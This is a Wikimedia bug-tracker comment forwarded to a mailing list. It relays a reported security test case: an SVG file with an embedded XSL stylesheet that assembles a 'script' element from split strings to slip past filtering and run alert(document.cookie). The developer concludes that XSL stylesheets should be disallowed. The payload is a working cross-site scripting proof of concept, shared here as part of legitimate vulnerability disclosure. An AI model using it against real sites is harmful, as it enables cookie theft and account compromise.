https://bugzilla.wikimedia.org/show_bug.cgi?id=29296
--- Comment #4 from Tim Starling <tstarl...@wikimedia.org> 2012-02-27 23:04:43 UTC --- majinboo <majin...@hackerzvoice.net> reported the following test case to secur...@wikimedia.org: <?xml version="1.0"?> <?xml-stylesheet type="text/xml" href="#stylesheet"?> <!DOCTYPE doc [ <!ATTLIST xsl:stylesheet id ID #REQUIRED>]> <svg xmlns="http://www.w3.org/2000/svg"> <xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> <xsl:variable name="s"><xsl:value-of select="'s'" /></xsl:variable> <xsl:variable name="c"><xsl:value-of select="'cript'" /></xsl:variable> <xsl:element name="{$s}{$c}">alert(document.cookie)</xsl:element> </xsl:template> </xsl:stylesheet> <circle fill="red" r="40"></circle> </svg> I guess we should not allow XSL stylesheets. -- Configure bugmail: https://bugzilla.wikimedia.org/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug. You are on the CC list for the bug. _______________________________________________ Wikibugs-l mailing list Wikibugs-l@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/wikibugs-l